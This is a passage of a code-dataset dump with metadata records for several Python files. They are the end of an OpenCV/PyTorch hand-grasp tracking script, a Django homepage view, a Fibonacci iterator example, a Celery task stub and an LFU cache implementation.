range(len(sort_index)):\r\n # box_design_sort.append(box_design[sort_index[i]])\r\n \r\n # print(box_design) #_sort\r\n \r\n #else:\r\n # print(\"NOT DETECTED\")\r\n\r\n\r\n #print(str(n_frame) + \" processed\")\r\n #cv2.imshow('Stream', np.squeeze(results.render()))\r\n\r\n\r\n 
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Put Text\r\n\r\n #cv2.putText(frame, \"Timer \", (150, 750), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 2)\r\n #cv2.putText(frame, str(timer_task) + \" s\", (350, 750), cv2.FONT_HERSHEY_SIMPLEX, 3, (0, 0, 255), 5)\r\n\r\n #if(timer_flag_01 == False):\r\n # cv2.putText(frame, \"Task 1 : \" + str(timer_task_01) + \" s\", (150, 800), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_02 == False):\r\n # cv2.putText(frame, \"Task 2 : \" + str(timer_task_02) + \" s\", (150, 830), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_03 == False):\r\n # cv2.putText(frame, \"Task 3 : \" + str(timer_task_03) + \" s\", (150, 860), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_04 == False):\r\n # cv2.putText(frame, \"Task 4 : \" + str(timer_task_04) + \" s\", (150, 890), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_05 == False):\r\n # cv2.putText(frame, \"Task 5 : \" + str(timer_task_05) + \" s\", (150, 920), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_06 == False):\r\n # cv2.putText(frame, \"Task 6 : \" + str(timer_task_06) + \" s\", (150, 950), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_07 == False):\r\n # cv2.putText(frame, \"Task 7 : \" + str(timer_task_07) + \" s\", (150, 980), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_08 == False):\r\n # cv2.putText(frame, \"Task 8 : \" + str(timer_task_08) + \" s\", (150, 1010), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n \r\n cv2.imshow('Stream', frame)\r\n\r\n timer = round (time.time() - start_zero , 2) \r\n writer_sta.writerow([ timer, timer_task, grasp_type, rotate_type, str(box_near_hand) ])\r\n\r\n #if (thumb_state == 1 or task_state == 1): # or thumb_state == -1\r\n # efficacy_state = 1\r\n #else:\r\n # efficacy_state = 0q\r\n\r\n if (hand_status == True):\r\n writer_ang.writerow([ timer, timer_task, \r\n angle_0[0], angle_0[1], angle_0[2],\r\n angle_1[0], angle_1[1], angle_1[2],\r\n angle_2[0], angle_2[1], angle_2[2], \r\n angle_3[0], angle_3[1], angle_3[2],\r\n angle_4[0], angle_4[1], angle_4[2], task_state, thumb_state ])\r\n \r\n\r\n\r\n print( \"GRASP :\" + str(grasp_pose) + \" ; TIMER :\" + str(timer_task_all) )\r\n\r\n #n_contour = 0\r\n\r\n #else:\r\n #print(n_frame)\r\n #cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)\r\n\r\n #cv2.imshow('Stream', frame)\r\n \r\n if cv2.waitKey(10) & 0xFF == ord('q'):\r\n break\r\n\r\n n_frame = n_frame + 1\r\n\r\n else:\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n", "repo_name": "anom-tmu/bdt-multiscopic", "sub_path": "03_testing_uppertable.py", "file_name": "03_testing_uppertable.py", "file_ext": "py", "file_size_in_byte": 53667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "csv.writer", "line_number": 40, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 71, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 72, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 73, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": 
"torch_geometric.nn.global_mean_pool", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 102, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 104, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 105, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch_geometric.nn.global_mean_pool", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 135, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 153, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 164, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 220, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 225, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 228, "usage_type": "call"}, {"api_name": "mediapipe.solutions", "line_number": 239, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 240, "usage_type": "attribute"}, {"api_name": "numpy.multiply", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 285, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 287, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 288, "usage_type": "call"}, {"api_name": "math.acos", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 290, "usage_type": 
"call"}, {"api_name": "numpy.abs", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 291, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 296, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 297, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 297, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 317, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 319, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 320, "usage_type": "call"}, {"api_name": "math.acos", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 323, "usage_type": "attribute"}, {"api_name": "torch.hub.load", "line_number": 347, "usage_type": "call"}, {"api_name": "torch.hub", "line_number": 347, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 362, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 364, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 364, "usage_type": "attribute"}, {"api_name": "cv2.resizeWindow", "line_number": 365, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 367, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 367, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 368, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 368, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 369, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 369, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 370, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 370, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 371, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 371, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 372, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 372, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 382, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 382, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 383, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 383, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 384, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 384, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 385, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 385, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 386, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 386, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 387, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 387, "usage_type": "attribute"}, {"api_name": 
"cv2.threshold", "line_number": 389, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 389, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 390, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 390, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 391, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 391, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 392, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 392, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 393, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 393, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 394, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 394, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 398, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 399, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 400, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 401, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 402, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 403, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 404, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 405, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 406, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 407, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 409, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 409, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 410, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 410, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 411, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 411, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 412, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 412, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 413, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 413, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 414, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 414, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 415, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 415, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 416, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 416, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 417, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 417, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 418, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 418, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 420, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 420, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 421, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 421, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 422, "usage_type": "call"}, 
{"api_name": "cv2.THRESH_BINARY", "line_number": 422, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 423, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 423, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 424, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 424, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 425, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 425, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 426, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 426, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 427, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 427, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 428, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 428, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 429, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 429, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 471, "usage_type": "call"}, {"api_name": "time.time", "line_number": 472, "usage_type": "call"}, {"api_name": "time.time", "line_number": 499, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 515, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 515, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 523, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 523, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 570, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 584, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 588, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 589, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 590, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 591, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 605, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 656, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 661, "usage_type": "attribute"}, {"api_name": "torch_geometric.data.Data", "line_number": 664, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 667, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 667, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 671, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 671, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 672, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 675, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 675, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 679, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 679, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 683, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 683, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 687, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 687, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 691, "usage_type": 
"call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 691, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 695, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 695, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 701, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 701, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 705, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 705, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 720, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 722, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 722, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 726, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 755, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 756, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 756, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 757, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 757, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 796, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 803, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 803, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 828, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 834, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 842, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 842, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 849, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 852, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 855, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 858, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 861, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 864, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 887, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 888, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 889, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 890, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 891, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 892, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 917, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 918, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 919, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 920, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 921, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 922, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 946, "usage_type": "call"}, {"api_name": "time.time", "line_number": 951, "usage_type": "call"}, {"api_name": "time.time", "line_number": 959, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 964, "usage_type": "call"}, {"api_name": "time.time", "line_number": 969, "usage_type": "call"}, {"api_name": "time.time", "line_number": 977, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 982, "usage_type": "call"}, {"api_name": "time.time", 
"line_number": 987, "usage_type": "call"}, {"api_name": "time.time", "line_number": 995, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1000, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1005, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1013, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1018, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1023, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1031, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1036, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1041, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1049, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1054, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1059, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1067, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1072, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1077, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1085, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 1139, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1141, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 1169, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 1178, "usage_type": "call"}]}
+{"seq_id": "23596415074", "text": "import os\nfrom copy import deepcopy\n\nfrom django.views.generic import TemplateView, View\nfrom django.conf import settings\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render\n\nfrom .cv import CV\n\n\ndef static_url(relative_path: str) -> str:\n return os.path.join(settings.STATIC_URL, relative_path)\n\n\nclass NavView(View):\n\n NAV_DEFAULT = {\n 'home': {\n 'label': 'Home',\n 'active': False,\n 'url': reverse_lazy('home')\n },\n 'blog': {\n 'label': 'The Blog',\n 'active': False,\n 'url': reverse_lazy('blog:entry_list')\n }\n }\n\n def __init__(self, *args, **kwargs):\n self.nav = deepcopy(self.NAV_DEFAULT)\n super(NavView, self).__init__(*args, **kwargs)\n\n\nclass HomepageView(NavView):\n\n template = 'pages/home.html'\n\n def get(self, request):\n\n context = {\n 'nav': self.nav\n }\n context.update(CV)\n context['nav']['home']['active'] = True\n\n return render(request, self.template, context=context)\n\n\n\n\n", "repo_name": "the16thpythonist/electronicheart", "sub_path": "electronicheart/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 13, "usage_type": "name"}, {"api_name": "django.views.generic.View", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.reverse_lazy", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 27, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "cv.CV", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "36362980224", "text": "\"\"\"\nIterador para la serie de Fibonacci.\n\nCreamos el iterador como una clase derivada de collections.abc.Iterator.\n\nAutor: Rafael del Castillo Gomariz\n\"\"\"\nfrom typeguard import typechecked\nfrom collections.abc import Iterator\n\n\n@typechecked\nclass FibonacciIterator(Iterator):\n\n def __init__(self, stop: int = 10):\n if stop < 1:\n raise ValueError(\"El máximo de elementos de la serie no puede ser negativo\")\n self.__index = 0\n self.__current = 0\n self.__next = 1\n self.__stop = stop\n\n def __next__(self):\n if self.__index == self.__stop:\n raise StopIteration\n self.__index += 1\n fib_num = self.__current\n self.__current, self.__next = self.__next, self.__current + self.__next\n return fib_num\n\nif __name__ == '__main__':\n print(\"Serie de Fibonacci\")\n print(\"------------------\")\n\n n = int(input(\"¿Cuántos números quiere mostrar? \"))\n for i, fib_n in enumerate(FibonacciIterator(n)):\n print(f\"{i+1}: {fib_n}\")\n", "repo_name": "rdelcastillo/DAW-Python", "sub_path": "ejemplosclase/7iteradores/iterador_fibonacci.py", "file_name": "iterador_fibonacci.py", "file_ext": "py", "file_size_in_byte": 1028, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.abc.Iterator", "line_number": 13, "usage_type": "name"}, {"api_name": "typeguard.typechecked", "line_number": 12, "usage_type": "name"}]}
+{"seq_id": "30727276831", "text": "import os\nimport time\nfrom celery import Celery\n\nCELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL', 'redis://localhost:6379'),\nCELERY_RESULT_BACKEND = os.environ.get('CELERY_RESULT_BACKEND', 'redis://localhost:6379')\n\ncelery = Celery('tasks', broker=CELERY_BROKER_URL, backend=CELERY_RESULT_BACKEND)\n\n@celery.task(name='tasks.find_solution')\ndef find_solution(ncs: str, sequence: str, stocks: str) -> str:\n time.sleep(5)\n return 'ncs: {}\\nsequence: {}\\nstock: {}'.format(ncs, sequence, stocks)", "repo_name": "micolaprs/comblabel", "sub_path": "src/queue/tasks.py", "file_name": "tasks.py", "file_ext": "py", "file_size_in_byte": 504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ.get", "line_number": 5, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "celery.Celery", "line_number": 8, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 12, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "23882870380", "text": "from collections import defaultdict, OrderedDict\n\nclass LFUCache:\n\n# Approach: Use ordereddict and normal dict, keep updating stack as and when a key is accessed\n# TC: O(1) for get and put functions as we use ordereddict which works like a DLL\n# SC: O(1) + O(1) as capacity of the 2 dicts is constant\n\n def __init__(self, capacity: int):\n self.value_map = {} # To store all keys and their frequencies (key:freq)\n self.freq_map = {} # To store all keys and value in cache in order (freq: {key: val})\n self.capacity = capacity\n self.lowest_frequency = 1\n\n def update_key(self,key: int, value: int = None): \n freq = self.value_map[key]\n if not value:\n # Get operation being performed so retain val\n val = self.freq_map[freq][key]\n else:\n # Put operation for exisiting key, so update val\n val = value\n # 1. Remove entry from freqmap\n del self.freq_map[freq][key] \n # 2. Append to front of freqmap\n if freq+1 in self.freq_map:\n self.freq_map[freq+1][key] = val \n else:\n self.freq_map[freq+1]= defaultdict(OrderedDict)\n self.freq_map[freq+1][key] = val \n # 3. Update freq in valuemap\n self.value_map[key] = freq+1\n \n if self.lowest_frequency == freq and not self.freq_map[freq]: # Update lowest freq\n self.lowest_frequency += 1\n \n return val\n\n def get(self, key: int) -> int:\n if key in self.value_map:\n # If key exists, return and update freq_map and value_map\n return self.update_key(key)\n return -1\n\n def put(self, key: int, value: int) -> None:\n if not key in self.value_map:\n # Adding new entry so check cache capacity \n if not self.capacity:\n # Evict key and value\n if self.lowest_frequency in self.freq_map:\n # 1. Get 1 st key in ordered dict\n first_key = next(iter(self.freq_map[self.lowest_frequency]))\n if len(self.freq_map[self.lowest_frequency]) > 1: \n # 2. If more than one entry for lowest freq, need to evict as per lru\n del self.freq_map[self.lowest_frequency][first_key]\n del self.value_map[first_key]\n else:\n # 3. Only one entry for lowest frew so evict directly\n del self.freq_map[self.lowest_frequency]\n del self.value_map[first_key]\n self.capacity += 1\n if self.capacity:\n # To ensure there is any capacity to begin with \n if 1 not in self.freq_map: # Adding element for first time so freq is 1\n self.freq_map[1] = defaultdict(OrderedDict)\n self.freq_map[1][key] = value # Add key in freqmap\n self.value_map[key] = 1 # Add key in valuemap\n self.lowest_frequency = min(1, self.lowest_frequency) # Update lowest freq\n self.capacity -= 1 # Update capacity\n else:\n # Updating existing entry \n self.update_key(key,value)\n\n# Your LFUCache object will be instantiated and called as such:\n# 